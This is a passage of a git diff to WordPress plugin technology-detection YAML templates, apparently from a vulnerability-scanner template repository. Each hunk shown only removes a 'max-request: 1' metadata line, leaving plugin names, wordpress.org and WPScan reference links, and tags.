b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9de0ee313..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 8033aacbc6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 